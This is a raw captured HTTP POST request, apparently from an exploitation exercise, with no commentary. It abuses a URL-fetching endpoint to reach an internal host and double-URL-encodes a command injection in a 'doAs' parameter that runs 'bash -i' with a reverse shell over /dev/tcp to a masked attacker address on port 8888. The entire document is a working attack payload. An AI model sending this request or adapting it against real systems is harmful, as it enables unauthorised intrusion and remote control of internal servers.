POST /file HTTP/1.1
Host: 1.13.254.132:8080
Content-Length: 116
Accept: text/plain, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Origin: http://1.13.254.132:8080
Referer: http://1.13.254.132:8080/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: JSESSIONID=079D05EA2477663463009EADC94CA8B9
Connection: close

url=http://10.244.0.230:8080/?doAs=%253bbash%2b-i%2b>%2526%2b/dev/tcp/*.*.*.*/8888%2b0>%25261&Vcode=LRN9